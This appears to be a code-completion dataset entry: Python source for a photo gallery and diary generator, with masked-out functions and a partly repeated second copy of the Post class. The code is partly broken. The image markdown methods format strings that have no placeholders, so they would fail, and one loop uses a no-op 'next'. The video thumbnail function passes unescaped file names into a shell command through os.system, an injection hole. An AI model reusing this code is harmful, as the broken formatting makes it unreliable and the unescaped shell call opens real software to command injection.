media))\n return cls(date, text, medias)\n\n @classmethod\n def from_date(cls, date):\n dt = datetime.datetime.strptime(date, '%Y%m%d')\n datetext = dt.strftime('%A %d %B %Y').capitalize()\n post = cls(date, text=datetext, medias=[])\n post.daterank = 1\n return post\n\n def to_html(self, args, target='regular'):\n if target == 'regular':\n if args.diary:\n return self.to_html_diary(args)\n else:\n return self.to_html_regular(args)\n if target == 'blogger':\n return self.to_html_blogger()\n\n def to_html_regular(self, args):\n html = list()\n if self.text:\n html.append(markdown.markdown(self.text))\n subdirs, dcim = dispatch_post_items(self.dcim)\n if self.dcim:\n html.append(SEP)\n for media in subdirs:\n html.append(media.to_html_dcim(args))\n if dcim:\n html.append(f'<div id=\"gallery-dcim-{self.date}-{self.daterank}\">')\n for media in dcim:\n html.append(media.to_html_dcim(args))\n html.append('</div>')\n html.append(SEP)\n return html\n\n def to_html_diary(self, args):\n html = list()\n if self.extra:\n html.append('<div class=\"extra\">')\n if self.text:\n html.append(markdown.markdown(self.text))\n if self.medias:\n html.append(f'<div id=\"gallery-blog-{self.date}-{self.daterank}\">')\n for media in self.medias:\n html.append(media.to_html_post(args))\n html.append('</div>')\n _, dcim = dispatch_post_items(self.dcim)\n if dcim:\n html.append(f'<div id=\"gallery-dcim-{self.date}-{self.daterank}\">')\n html.append(SEP)\n for media in dcim:\n html.append(media.to_html_dcim(args))\n html.append('</div>')\n html.append(SEP)\n if self.extra:\n html.append('</div>')\n return html\n\n def to_html_blogger(self):\n html = list()\n html.append(markdown.markdown(self.text))\n for image in self.medias:\n html.append(image.to_html_blogger())\n html.append(SEP)\n return html\n\n\nclass PostItem:\n\n def __init__(self, caption, uri, thumb=None, thumbsize=None, descr=''):\n self.caption = caption\n self.uri = uri\n self.basename = os.path.basename(uri)\n self.thumb = thumb\n self.thumbsize = thumbsize\n self.descr = descr\n self.resized_url = None\n\n\nclass PostImage(PostItem):\n\n def to_markdown(self):\n if not self.caption:\n return '' % (self.uri,)\n else:\n return '\\n%s' % (self.uri, self.caption)\n\n def to_html_post(self, args):\n descr = self.descr if args.thumbnails.media_description else ''\n if not self.caption:\n return IMGPOST % (self.uri, self.thumb, *self.thumbsize, descr)\n else:\n return IMGPOSTCAPTION % (self.uri, self.thumb, *self.thumbsize,\n descr, self.caption)\n\n def to_html_dcim(self, args):\n descr = self.descr if args.thumbnails.media_description else ''\n return IMGDCIM % (relative_url(self.uri, args.root), self.thumb, *\n self.thumbsize, descr)\n\n def to_html_blogger(self):\n if not self.caption:\n return BIMGPAT % (self.uri, self.resized_url)\n else:\n return f'{BIMGPAT}\\n{CAPTION_PAT}' % (self.uri, self.\n resized_url, self.caption)\n\n\nclass PostVideo(PostItem):\n\n def to_markdown(self):\n if not self.caption:\n return '[](%s)' % (self.uri,)\n else:\n return '[](%s)\\n%s' % (self.uri, self.caption)\n\n def to_html_post(self, args):\n descr = self.descr if args.thumbnails.media_description else ''\n if not self.caption:\n return VIDPOST % (self.uri, self.thumb, *self.thumbsize, descr)\n else:\n return VIDPOSTCAPTION % (self.uri, self.thumb, *self.thumbsize,\n descr, self.caption)\n\n def to_html_dcim(self, args):\n descr = self.descr if args.thumbnails.media_description else ''\n return VIDDCIM % (relative_url(self.uri, args.root), self.thumb, *\n self.thumbsize, descr)\n\n def to_html_blogger(self):\n x = f'<p style=\"text-align: center;\">{self.iframe}</p>'\n if not self.caption:\n return x\n else:\n return f'%s\\n{CAPTION_PAT}' % (x, self.caption)\n\n\nclass PostSubdir(PostItem):\n\n def to_html_dcim(self, args):\n basename = os.path.basename(self.htmname)\n posts = self.posts\n title = self.caption\n print_html(args, posts, title, self.htmname)\n if not self.caption:\n return DIRPOST % (basename, self.thumb, *self.thumbsize)\n else:\n return DIRPOSTCAPTION % (basename, self.thumb, *self.thumbsize,\n self.caption)\n\n\n<mask token>\n\n\ndef parse_markdown(filename):\n \"\"\"\n Generate Post objects from markdown. Date must be present in each post and\n posts must be ordrered by date.\n \"\"\"\n if not os.path.exists(filename):\n error('File not found', filename)\n posts = list()\n with open(filename, encoding='utf-8') as f:\n line = next(f)\n if line.startswith('# '):\n title = line[2:].strip()\n record = []\n next(f)\n else:\n title = None\n record = [line]\n for line in f:\n if not line.startswith('___'):\n record.append(line)\n else:\n posts.append(Post.from_markdown(record))\n record = []\n daterank = defaultdict(int)\n for post in posts:\n daterank[post.date] += 1\n post.daterank = daterank[post.date]\n for post1, post2 in zip(posts[:-1], posts[1:]):\n if post1.date > post2.date:\n error('Posts are not ordered', f'{post1.date} > {post2.date}')\n return title, posts\n\n\ndef print_markdown(posts, title, fullname):\n with open(fullname, 'wt', encoding='utf-8') as fdst:\n print(f'# {title}\\n', file=fdst)\n for post in posts:\n date = f'[{post.date[0:4]}/{post.date[4:6]}/{post.date[6:8]}]'\n print(date, file=fdst)\n if post.text:\n print(file=fdst)\n for line in post.text.splitlines():\n if not line:\n print(file=fdst)\n else:\n for chunk in textwrap.wrap(line, width=78):\n print(chunk, file=fdst)\n if post.medias:\n print(file=fdst)\n for media in post.medias:\n print(media.to_markdown(), file=fdst)\n print('______', file=fdst)\n\n\n<mask token>\n\n\ndef is_image_file(name):\n return os.path.splitext(name)[1].lower() in ('.jpg', '.jpeg', '.png',\n '.gif', '.bmp', '.webp', '.tif')\n\n\n<mask token>\n\n\ndef is_media(name):\n return is_image_file(name) or is_video_file(name)\n\n\n<mask token>\n\n\ndef date_from_name(name):\n if (match := re.search('(?:\\\\D|^)(\\\\d{8})(?:\\\\D|$)', name, re.ASCII)):\n digits = match.group(1)\n if validate_date(digits):\n return digits\n return None\n\n\ndef date_from_item(filename):\n if (date := date_from_name(filename)):\n return date\n else:\n timestamp = os.path.getmtime(filename)\n return datetime.datetime.fromtimestamp(timestamp).strftime('%Y%m%d')\n\n\ndef time_from_name(name):\n if (match := re.search('(?:\\\\D|^)(\\\\d{8})\\\\D(\\\\d{6})(?:\\\\D|$)', name,\n re.ASCII)):\n digits = match.group(2)\n hour, minute, second = int(digits[0:2]), int(digits[2:4]), int(digits\n [4:6])\n if 0 <= hour < 24 and 0 <= minute < 60 and 0 <= second < 60:\n return digits\n return None\n\n\ndef time_from_item(filename):\n if (time := time_from_name(filename)):\n return time\n else:\n timestamp = os.path.getmtime(filename)\n return datetime.datetime.fromtimestamp(timestamp).strftime('%H%M%S')\n\n\n<mask token>\n\n\ndef get_image_info(filename):\n date = date_from_item(filename)\n time = time_from_item(filename)\n img = Image.open(filename)\n width, height = img.size\n size = round(os.path.getsize(filename) / 1000000.0, 1)\n return (date, time, width, height, size\n ), f'{date} {time}, dim={width}x{height}, {size} MB'\n\n\ndef get_video_info(filename, info_fullname):\n if os.path.exists(info_fullname):\n with open(info_fullname) as f:\n info = f.readline().split()\n date, time, width, height, size, duration, fps = info[0], info[1], int(\n info[2]), int(info[3]), float(info[4]), int(info[5]), float(info[6]\n )\n formatted_info = format_video_info(date, time, width, height, size,\n duration, fps)\n return (date, time, width, height, size, duration, fps), formatted_info\n else:\n info, formatted_info = make_video_info(filename, info_fullname)\n with open(info_fullname, 'wt') as f:\n print(' '.join([str(_) for _ in info]), file=f)\n return info, formatted_info\n\n\ndef make_video_info(filename, info_fullname):\n date = date_from_item(filename)\n time = time_from_item(filename)\n command = [*FFPROBE_CMD.split(), filename]\n try:\n output = check_output(command, stderr=STDOUT).decode()\n width, height, fps, duration = parse_ffprobe_output(output)\n size = round(os.path.getsize(filename) / 1000000.0, 1)\n output = format_video_info(date, time, width, height, size,\n duration, fps)\n except CalledProcessError as e:\n output = e.output.decode()\n warning(output)\n raise\n return (date, time, width, height, size, duration, fps), output\n\n\ndef parse_ffprobe_output(ffprobe_output):\n match = re.match(\n '(\\\\d+),(\\\\d+),(\\\\d+)/(\\\\d+),(\\\\d+/\\\\d+).*\\\\s(\\\\d+\\\\.\\\\d+)',\n ffprobe_output, re.DOTALL)\n width = int(match.group(1))\n height = int(match.group(2))\n fps = round(int(match.group(3)) / int(match.group(4)), 1)\n duration = round(float(match.group(6)))\n return width, height, fps, duration\n\n\ndef format_video_info(date, time, width, height, size, duration, fps):\n return (\n f'{date} {time}, dim={width}x{height}, {format_duration(duration)}, fps={fps}, {size} MB'\n )\n\n\n<mask token>\n\n\ndef size_thumbnail(width, height, maxdim):\n if width >= height:\n return maxdim, int(round(maxdim * height / width))\n else:\n return int(round(maxdim * width / height)), maxdim\n\n\ndef make_thumbnail_image(args, image_name, thumb_name, size):\n if os.path.exists(thumb_name) and args.forcethumb is False:\n pass\n else:\n print('Making thumbnail:', thumb_name)\n create_thumbnail_image(image_name, thumb_name, size)\n\n\ndef create_thumbnail_image(image_name, thumb_name, size):\n imgobj = Image.open(image_name)\n if imgobj.mode != 'RGBA' and image_name.endswith('.jpg') and not (\n image_name.endswith('.gif') and imgobj.info.get('transparency')):\n imgobj = imgobj.convert('RGBA')\n imgobj.thumbnail(size, Image.LANCZOS)\n imgobj = imgobj.convert('RGB')\n imgobj.save(thumb_name)\n\n\ndef make_thumbnail_video(args, video_name, thumb_name, size, duration):\n if os.path.exists(thumb_name) and args.forcethumb is False:\n pass\n else:\n print('Making thumbnail:', thumb_name)\n create_thumbnail_video(args, video_name, thumb_name, size, duration)\n\n\n<mask token>\n\n\ndef create_thumbnail_video(args, filename, thumbname, size, duration):\n delay = min(duration - 1, args.thumbnails.thumbdelay)\n sizearg = '%dx%d' % size\n command = (\n 'ffmpeg -y -v error -itsoffset -%d -i \"%s\" -vcodec mjpeg -vframes 1 -an -f rawvideo -s %s \"%s\"'\n )\n command = command % (delay, filename, sizearg, thumbname)\n result = os.system(command)\n try:\n img1 = Image.open(thumbname)\n except:\n warning('Unable to save thumbnail for', filename)\n return\n img2 = Image.open(io.BytesIO(base64.b64decode(VIDEO_ICON)))\n width, height = img1.size\n img1.paste(img2, (6, height - 20 - 6), None)\n img1.save(thumbname)\n\n\n<mask token>\n\n\ndef create_thumbnail_subdir(subdir_name, thumb_name, size, items, thumbdir):\n\n def size_thumbnail(width, height, xmax, ymax):\n width2 = xmax\n height2 = int(round(xmax * height / width))\n if height2 < ymax:\n width2 = int(round(ymax * width / height))\n height2 = ymax\n return width2, height2\n thumblist = [os.path.basename(item.thumb) for item in items]\n widthnum, heightnum, width, height, offsetx, offsety = mosaic_geometry(size\n , thumblist)\n thumbnum = widthnum * heightnum\n img = Image.new('RGB', size, SUBDIR_BACKCOL)\n for ind, thumb in enumerate(thumblist[:min(thumbnum, len(thumblist))]):\n row = ind // widthnum\n col = ind % widthnum\n img2 = Image.open(os.path.join(thumbdir, thumb))\n w, h = size_thumbnail(*img2.size, width[col], height[row])\n cropdim = (w - width[col]) // 2, (h - height[row]) // 2, (w - width\n [col]) // 2 + width[col], (h - height[row]) // 2 + height[row]\n img2 = img2.resize((w, h), Image.LANCZOS)\n img2 = img2.crop(cropdim)\n img.paste(img2, (offsetx[col], offsety[row]))\n if os.path.exists(thumb_name):\n imgref = Image.open(thumb_name)\n byteio = io.BytesIO()\n img.save(byteio, 'JPEG')\n byteio.seek(0)\n imgnew = Image.open(byteio)\n diff = ImageChops.difference(imgnew, imgref)\n if diff.getbbox() is None:\n return\n img.save(thumb_name)\n\n\n<mask token>\n\n\ndef list_of_htmlfiles_in_items(itemlist):\n htmlist = list()\n for item in itemlist:\n if type(item) == PostSubdir:\n htmlist.append(item.htmname)\n htmlist.extend(list_of_htmlfiles_in_items(item.sublist))\n return htmlist\n\n\ndef list_of_thumbnails(posts, diary=False):\n thumblist = list()\n for post in posts:\n thumblist.extend(list_of_thumbnails_in_items(post.medias))\n if diary is False:\n thumblist.extend(list_of_thumbnails_in_items(post.dcim))\n return thumblist\n\n\ndef list_of_thumbnails_in_items(itemlist):\n thumblist = list()\n for item in itemlist:\n if type(item) == PostSubdir:\n thumblist.append(os.path.basename(item.thumb))\n thumblist.extend(list_of_thumbnails_in_items(item.sublist))\n else:\n thumblist.append(os.path.basename(item.thumb))\n return thumblist\n\n\ndef purge_htmlfiles(args, posts):\n \"\"\"\n Purge root dir from irrelevant html files\n \"\"\"\n htmlist = list_of_htmlfiles(args, posts)\n html_to_remove = list()\n for fullname in glob.glob(os.path.join(args.root, '*.htm*')):\n if fullname not in htmlist:\n html_to_remove.append(fullname)\n if len(html_to_remove) > args.thumbnails.threshold_htmlfiles:\n inpt = 'x'\n while inpt not in 'yn':\n inpt = input(\n f'{len(html_to_remove)} html files to remove. Continue [y|n]? '\n ).lower()\n if inpt == 'n':\n return\n for name in html_to_remove:\n print('Removing html files', name)\n os.remove(name)\n\n\ndef purge_thumbnails(args, thumbdir, posts, diary=False):\n \"\"\"\n Purge thumbnail dir from irrelevant thumbnails\n \"\"\"\n thumblist = list_of_thumbnails(posts, diary)\n thumbs_to_remove = list()\n for fullname in glob.glob(os.path.join(thumbdir, '*.jpg')):\n if os.path.basename(fullname) not in thumblist:\n thumbs_to_remove.append(fullname)\n if len(thumbs_to_remove) > args.thumbnails.threshold_thumbs:\n inpt = 'x'\n while inpt not in 'yn':\n inpt = input(\n f'{len(thumbs_to_remove)} thumbnails to remove. Continue [y|n]? '\n ).lower()\n if inpt == 'n':\n return\n for name in thumbs_to_remove:\n print('Removing thumbnail', name)\n os.remove(name)\n info_fullname = os.path.splitext(name)[0] + '.info'\n if os.path.exists(info_fullname):\n os.remove(info_fullname)\n\n\ndef is_media_within_dates(fullname, dates):\n if is_media(fullname):\n if type(dates) == tuple:\n return dates[0] <= date_from_item(fullname) <= dates[1]\n else:\n return True\n else:\n return False\n\n\ndef sorted_listdir(filelist):\n like_windows_explorer = True\n if not filelist:\n return filelist\n if like_windows_explorer:\n maxlen = max(len(os.path.splitext(name)[0]) for name in filelist)\n\n def keyfunc(name):\n root, ext = os.path.splitext(name.lower())\n return root.ljust(maxlen, ' ') + ext\n else:\n keyfunc = str.lower\n return sorted(filelist, key=keyfunc)\n\n\n<mask token>\n\n\ndef list_of_medias(args, sourcedir, recursive):\n \"\"\"\n Return the list of full paths for pictures and movies in source directory\n \"\"\"\n files = list_of_files(sourcedir, recursive)\n return [_ for _ in files if is_media_within_dates(_, args.dates)]\n\n\n<mask token>\n\n\ndef dispatch_post_items(list_of_post_items):\n subdirs = [_ for _ in list_of_post_items if type(_) is PostSubdir]\n medias = [_ for _ in list_of_post_items if type(_) is not PostSubdir]\n return subdirs, medias\n\n\ndef create_item(args, media_fullname, sourcedir, thumbdir, key, thumbmax):\n if os.path.isfile(media_fullname):\n if is_image_file(media_fullname):\n return create_item_image(args, media_fullname, sourcedir,\n thumbdir, key, thumbmax)\n else:\n return create_item_video(args, media_fullname, sourcedir,\n thumbdir, key, thumbmax)\n else:\n return create_item_subdir(args, media_fullname, sourcedir, thumbdir,\n key, thumbmax)\n\n\ndef create_item_image(args, media_fullname, sourcedir, thumbdir, key, thumbmax\n ):\n media_basename = os.path.basename(media_fullname)\n media_relname = relative_name(media_fullname, sourcedir)\n thumb_basename = thumbname(media_relname, key)\n thumb_fullname = os.path.join(thumbdir, thumb_basename)\n try:\n info, infofmt = get_image_info(media_fullname)\n infofmt = media_basename + ': ' + infofmt\n thumbsize = size_thumbnail(info[2], info[3], thumbmax)\n make_thumbnail_image(args, media_fullname, thumb_fullname, thumbsize)\n return PostImage(None, media_fullname, '/'.join((args.thumbrep,\n thumb_basename)), thumbsize, infofmt)\n except PIL.UnidentifiedImageError:\n warning('Unable to read image', media_fullname)\n return None\n\n\ndef create_item_video(args, media_fullname, sourcedir, thumbdir, key, thumbmax\n ):\n media_basename = os.path.basename(media_fullname)\n media_relname = relative_name(media_fullname, sourcedir)\n thumb_basename = thumbname(media_relname, key)\n thumb_fullname = os.path.join(thumbdir, thumb_basename)\n info_fullname = os.path.splitext(thumb_fullname)[0] + '.info'\n try:\n info, infofmt = get_video_info(media_fullname, info_fullname)\n infofmt = media_basename + ': ' + infofmt\n thumbsize = size_thumbnail(info[2], info[3], thumbmax)\n make_thumbnail_video(args, media_fullname, thumb_fullname,\n thumbsize, duration=info[5])\n return PostVideo(None, media_fullname, '/'.join((args.thumbrep,\n thumb_basename)), thumbsize, infofmt)\n except CalledProcessError:\n warning('Unable to read video', media_fullname)\n return None\n\n\n<mask token>\n\n\ndef relative_name(media_fullname, sourcedir):\n \"\"\"\n /Gilles/Dev/journal/tests/subdir/deeper2/deepest/OCT_20000112_000004.jpg\n -->\n deeper2_deepest_OCT_20000112_000004.jpg\n\n /Gilles/Dev/journal/tests/subdir/deeper2/deepest\n -->\n deeper2_deepest\n \"\"\"\n x = os.path.relpath(media_fullname, sourcedir)\n x = x.replace('\\\\', '_').replace('/', '_').replace('#', '_')\n return x\n\n\n<mask token>\n\n\ndef make_posts_from_diary(args):\n md_filename = os.path.join(args.root, 'index.md')\n if os.path.exists(md_filename):\n title, posts = parse_markdown(md_filename)\n else:\n error('File not found', md_filename)\n for post in posts:\n for media in post.medias:\n media_fullname = os.path.join(args.root, media.uri)\n item = create_item(args, media_fullname, args.root, args.\n thumbdir, 'post', 400)\n media.thumb = item.thumb\n media.thumbsize = item.thumbsize\n media.descr = item.descr\n return title, posts\n\n\n<mask token>\n\n\ndef make_posts_from_subdir(args, dirname):\n if args.bydir is False:\n medias_ext = list_of_medias(args, dirname, args.recursive)\n else:\n medias_ext = list_of_medias_ext(args, dirname)\n postmedias = list()\n for item in medias_ext:\n postmedia = create_item(args, item, args.sourcedir, args.thumbdir,\n 'dcim', 300)\n if postmedia is not None:\n postmedias.append(postmedia)\n post = Post(date='00000000', text='', medias=[])\n post.dcim = postmedias\n posts = [post]\n title = os.path.basename(args.sourcedir) or os.path.splitdrive(args.\n sourcedir)[0]\n return title, posts\n\n\n<mask token>\n\n\ndef create_gallery(args):\n title, posts = make_posts(args, args.sourcedir)\n print_html(args, posts, title, os.path.join(args.dest, args.rootname),\n 'regular')\n purge_htmlfiles(args, posts)\n if args.diary and not args.sourcedir:\n purge_thumbnails(args, args.thumbdir, posts, diary=True)\n else:\n purge_thumbnails(args, args.thumbdir, posts)\n\n\ndef create_diary(args):\n medias = list_of_medias(args, args.sourcedir, args.recursive)\n if args.dates == 'diary':\n assert 0\n else:\n required_dates = {date_from_item(media) for media in medias}\n if type(args.dates) == tuple:\n date1, date2 = args.dates\n required_dates = {date for date in required_dates if date1 <=\n date <= date2}\n title = args.sourcedir\n posts = list()\n for date in sorted(required_dates):\n posts.append(Post.from_date(date))\n os.makedirs(args.root, exist_ok=True)\n print_markdown(posts, title, os.path.join(args.root, 'index.md'))\n\n\n<mask token>\n\n\ndef compare_image_buffers(imgbuf1, imgbuf2):\n \"\"\"\n return True if images read on file are identical, False otherwise\n \"\"\"\n with io.BytesIO(imgbuf1) as imgio1, io.BytesIO(imgbuf2) as imgio2:\n img1 = Image.open(imgio1)\n img2 = Image.open(imgio2)\n diff = ImageChops.difference(img1, img2)\n return not diff.getbbox()\n\n\ndef check_images(args, posts, online_images):\n result = True\n for post in posts:\n for media in post.medias:\n if type(media) is PostImage:\n if media.basename in online_images:\n with open(os.path.join(args.root, media.uri), 'rb') as f:\n imgbuf1 = f.read()\n try:\n with urlopen(online_images[media.basename][0]) as u:\n imgbuf2 = u.read()\n except FileNotFoundError:\n print('File not found', online_images[media.\n basename][0])\n next\n if compare_image_buffers(imgbuf1, imgbuf2) is False:\n print('Files are different, upload', media.basename)\n elif 1:\n print('File already online', media.basename)\n else:\n print('File is absent, upload', media.basename)\n result = False\n elif type(media) is PostVideo:\n print('Video not checked', media.basename)\n else:\n assert False\n return result\n\n\n<mask token>\n\n\ndef idempotence(args):\n \"\"\"\n For testing identity between a diary file and the fle obtained after reading\n and printing it. See testing.\n \"\"\"\n title, posts = parse_markdown(os.path.join(args.root, 'index.md'))\n print_markdown(posts, title, os.path.join(args.dest, 'index.md'))\n\n\n<mask token>\n\n\nclass MyConfigParser(ConfigParser):\n \"\"\"Add input checking.\"\"\"\n\n def __init__(self):\n ConfigParser.__init__(self, inline_comment_prefixes=(';',))\n\n def error(self, section, entry):\n error('Missing or incorrect config value:', '[%s]%s' % (section, entry)\n )\n\n def getint(self, section, entry, default=None):\n try:\n if default is None:\n return ConfigParser.getint(self, section, entry)\n else:\n return ConfigParser.getint(self, section, entry, raw=True,\n vars=None, fallback=default)\n except Exception as e:\n print(e)\n self.error(section, entry)\n\n def getboolean(self, section, entry, default=None):\n try:\n if default is None:\n return ConfigParser.getboolean(self, section, entry)\n else:\n return ConfigParser.getboolean(self, section, entry, raw=\n True, vars=None, fallback=default)\n except Exception as e:\n print(e)\n self.error(section, entry)\n\n\ndef configfilename(params):\n return os.path.join(params.root, '.config.ini')\n\n\ndef createconfig(config_filename):\n with open(config_filename, 'wt') as f:\n f.writelines(CONFIG_DEFAULTS)\n\n\ndef read_config(params):\n config_filename = configfilename(params)\n try:\n if not os.path.exists(config_filename) or params.resetcfg:\n createconfig(config_filename)\n except:\n error('Error creating configuration file')\n try:\n getconfig(params, config_filename)\n except Exception as e:\n error('Error reading configuration file.', str(e), 'Use --resetcfg')\n\n\n<mask token>\n\n\ndef setconfig_cmd(args):\n config_filename = configfilename(args)\n setconfig(config_filename, *args.setcfg)\n\n\ndef update_config(args):\n updates = ('sourcedir', args.sourcedir), ('bydir', BOOL[args.bydir]), (\n 'bydate', BOOL[args.bydate]), ('diary', BOOL[args.diary]), ('recursive'\n , BOOL[args.recursive]), ('dates', args.dates), ('github_pages',\n BOOL[args.github_pages])\n cfgname = configfilename(args)\n with open(cfgname) as f:\n cfglines = [_.strip() for _ in f.readlines()]\n for key, value in updates:\n for iline, line in enumerate(cfglines):\n if line.startswith(key):\n cfglines[iline] = f'{key} = {value}'\n break\n with open(cfgname, 'wt') as f:\n for line in cfglines:\n print(line, file=f)\n\n\ndef warning(*msg):\n print(colorama.Fore.YELLOW + colorama.Style.BRIGHT + ' '.join(msg),\n colorama.Style.RESET_ALL)\n\n\n<mask token>\n\n\ndef errorcode(msg):\n return ERRORS.splitlines().index(msg) + 1\n\n\ndef error(*msg):\n print(colorama.Fore.RED + colorama.Style.BRIGHT + ' '.join(msg),\n colorama.Style.RESET_ALL)\n sys.exit(errorcode(msg[0]))\n\n\n<mask token>\n\n\ndef setup_part1(args):\n \"\"\"\n Made before reading config file (config file located in args.root).\n Check and normalize root path.\n \"\"\"\n args.rootarg = args.root\n rootext = os.path.splitext(args.rootarg)[1]\n if rootext == '':\n pass\n else:\n args.root = os.path.dirname(args.root)\n if args.root:\n args.root = os.path.abspath(args.root)\n if not os.path.isdir(args.root):\n if args.gallery:\n os.mkdir(args.root)\n else:\n error('Directory not found', args.root)\n\n\ndef setup_part2(args):\n \"\"\"\n Made after reading config file.\n Check for ffmpeg in path.\n Create .thumbnails dir if necessary and create .nomedia in it.\n Copy photobox file to destination dir.\n Handle priority between command line and config file.\n \"\"\"\n if args.update:\n args.sourcedir = args.source.sourcedir\n args.bydir = args.source.bydir\n args.bydate = args.source.bydate\n args.diary = args.source.diary\n args.recursive = args.source.recursive\n args.dates = args.source.dates\n args.github_pages = args.source.github_pages\n elif args.gallery:\n args.source.sourcedir = args.sourcedir\n args.source.bydir = args.bydir\n args.source.bydate = args.bydate\n args.source.diary = args.diary\n args.source.recursive = args.recursive\n args.source.dates = args.dates\n args.source.github_pages = args.github_pages\n update_config(args)\n if args.github_pages:\n args.html_suffix = '.html'\n else:\n args.html_suffix = '.htm'\n rootext = os.path.splitext(args.rootarg)[1]\n if rootext:\n args.rootname = os.path.basename(args.rootarg)\n else:\n args.rootname = 'index' + args.html_suffix\n if args.sourcedir:\n args.sourcedir = os.path.abspath(args.sourcedir)\n if os.path.splitdrive(args.sourcedir)[0]:\n drive, rest = os.path.splitdrive(args.sourcedir)\n args.sourcedir = drive.upper() + rest\n if not os.path.isdir(args.sourcedir):\n error('Directory not found', args.sourcedir)\n elif args.gallery and args.diary is False and args.update is None:\n error('Directory not found', 'Use --sourcedir')\n if args.dest:\n args.dest = os.path.abspath(args.dest)\n if args.dest is None:\n args.dest = args.root\n if args.blogger and args.urlblogger is None:\n error('No blogger url (--url)')\n if args.gallery or args.update:\n for exe in ('ffmpeg', 'ffprobe'):\n try:\n check_output([exe, '-version'])\n except FileNotFoundError:\n error('File not found', exe)\n if args.github_pages:\n args.thumbrep = 'thumbnails'\n else:\n args.thumbrep = '.thumbnails'\n args.thumbdir = os.path.join(args.dest, args.thumbrep)\n if not os.path.exists(args.thumbdir):\n os.mkdir(args.thumbdir)\n open(os.path.join(args.thumbdir, '.nomedia'), 'a').close()\n favicondst = os.path.join(args.dest, 'favicon.ico')\n if not os.path.isfile(favicondst):\n faviconsrc = os.path.join(os.path.dirname(__file__), 'favicon.ico')\n shutil.copyfile(faviconsrc, favicondst)\n photoboxdir = os.path.join(args.dest, 'photobox')\n if not os.path.exists(photoboxdir):\n photoboxsrc = os.path.join(os.path.dirname(__file__), 'photobox')\n shutil.copytree(photoboxsrc, photoboxdir)\n if args.dates:\n if not (args.gallery or args.create):\n pass\n if args.dates == 'source':\n pass\n elif args.dates == 'diary':\n if args.create:\n error('Incorrect date format', args.dates)\n elif re.match('\\\\d+-\\\\d+', args.dates):\n date1, date2 = args.dates.split('-')\n if validate_date(date1) and validate_date(date2):\n args.dates = date1, date2\n else:\n error('Incorrect date format', args.dates)\n else:\n error('Incorrect date format', args.dates)\n\n\ndef main(argstring=None):\n colorama.init()\n args = parse_command_line(argstring)\n setup_part1(args)\n read_config(args)\n setup_part2(args)\n try:\n if args.gallery or args.update:\n create_gallery(args)\n elif args.create:\n create_diary(args)\n elif args.blogger:\n prepare_for_blogger(args)\n elif args.idem:\n idempotence(args)\n elif args.setcfg:\n setconfig_cmd(args)\n except KeyboardInterrupt:\n warning('Interrupted by user.')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Post:\n\n def __init__(self, date, text, medias):\n self.date = date\n self.text = text\n self.medias = medias\n self.dcim = []\n self.daterank = 0\n self.extra = False\n\n def __lt__(self, other):\n return self.date < other.date\n\n @classmethod\n def from_markdown(cls, post):\n m = re.match('\\\\[(\\\\d\\\\d\\\\d\\\\d/\\\\d\\\\d/\\\\d\\\\d)\\\\]\\\\n*', post[0])\n if m:\n date = m.group(1).replace('/', '')\n if not validate_date(date):\n error('Incorrect date value:', date)\n del post[0]\n else:\n error('No date in post', ' '.join(post))\n while post and not post[0].strip():\n del post[0]\n text = ''\n while post and not re.match('!?\\\\[\\\\]', post[0]):\n text += post[0]\n del post[0]\n text = re.sub('\\\\n\\\\n$', '\\n', text)\n medias = list()\n while post and (match := re.match('!?\\\\[\\\\]\\\\((.*)\\\\)', post[0])):\n media = match.group(1)\n caption = None\n del post[0]\n if post and not re.match('!?\\\\[\\\\]', post[0]):\n caption = post[0].strip()\n del post[0]\n if match.group(0)[0] == '!':\n medias.append(PostImage(caption, media))\n else:\n medias.append(PostVideo(caption, media))\n return cls(date, text, medias)\n\n @classmethod\n def from_date(cls, date):\n dt = datetime.datetime.strptime(date, '%Y%m%d')\n datetext = dt.strftime('%A %d %B %Y').capitalize()\n post = cls(date, text=datetext, medias=[])\n post.daterank = 1\n return post\n\n def to_html(self, args, target='regular'):\n if target == 'regular':\n if args.diary:\n return self.to_html_diary(args)\n else:\n return self.to_html_regular(args)\n if target == 'blogger':\n return self.to_html_blogger()\n\n def to_html_regular(self, args):\n html = list()\n if self.text:\n html.append(markdown.markdown(self.text))\n subdirs, dcim = dispatch_post_items(self.dcim)\n if self.dcim:\n html.append(SEP)\n for media in subdirs:\n html.append(media.to_html_dcim(args))\n if dcim:\n html.append(f'<div id=\"gallery-dcim-{self.date}-{self.daterank}\">')\n for media in dcim:\n html.append(media.to_html_dcim(args))\n html.append('</div>')\n html.append(SEP)\n return html\n\n def to_html_diary(self, args):\n html = list()\n if self.extra:\n html.append('<div class=\"extra\">')\n if self.text:\n html.append(markdown.markdown(self.text))\n if self.medias:\n html.append(f'<div id=\"gallery-blog-{self.date}-{self.daterank}\">')\n for media in self.medias:\n html.append(media.to_html_post(args))\n html.append('</div>')\n _, dcim = dispatch_post_items(self.dcim)\n if dcim:\n html.append(f'<div id=\"gallery-dcim-{self.date}-{self.daterank}\">')\n html.append(SEP)\n for media in dcim:\n html.append(media.to_html_dcim(args))\n html.append('</div>')\n html.append(SEP)\n if self.extra:\n html.append('</div>')\n return html\n\n def to_html_blogger(self):\n html = list()\n html.append(markdown.markdown(self.text))\n for image in self.medias:\n html.append(image.to_html_blogger())\n html.append(SEP)\n return html\n\n\nclass PostItem:\n\n def __init__(self, caption, uri, thumb=None, thumbsize=None, descr=''):\n self.caption = caption\n self.uri = uri\n self.basename = os.path.basename(uri)\n self.thumb = thumb\n self.thumbsize = thumbsize\n self.descr = descr\n self.resized_url = None\n\n\nclass PostImage(PostItem):\n\n def to_markdown(self):\n if not self.caption:\n return '' % (self.uri,)\n else:\n return '\\n%s' % (self.uri, self.caption)\n\n def to_html_post(self, args):\n descr = self.descr if args.thumbnails.media_description else ''\n if not self.caption:\n return IMGPOST % (self.uri, self.thumb, *self.thumbsize, descr)\n else:\n return IMGPOSTCAPTION % (self.uri, self.thumb, *self.thumbsize,\n descr, self.caption)\n\n def to_html_dcim(self, args):\n descr = self.descr if args.thumbnails.media_description else ''\n return IMGDCIM % (relative_url(self.uri, args.root), self.thumb, *\n self.thumbsize, descr)\n\n def to_html_blogger(self):\n if not self.caption:\n return BIMGPAT % (self.uri, self.resized_url)\n else:\n return f'{BIMGPAT}\\n{CAPTION_PAT}' % (self.uri, self.\n resized_url, self.caption)\n\n\nclass PostVideo(PostItem):\n\n def to_markdown(self):\n if not self.caption:\n return '[](%s)' % (self.uri,)\n else:\n return '[](%s)\\n%s' % (self.uri, self.caption)\n\n def to_html_post(self, args):\n descr = self.descr if args.thumbnails.media_description else ''\n if not self.caption:\n return VIDPOST 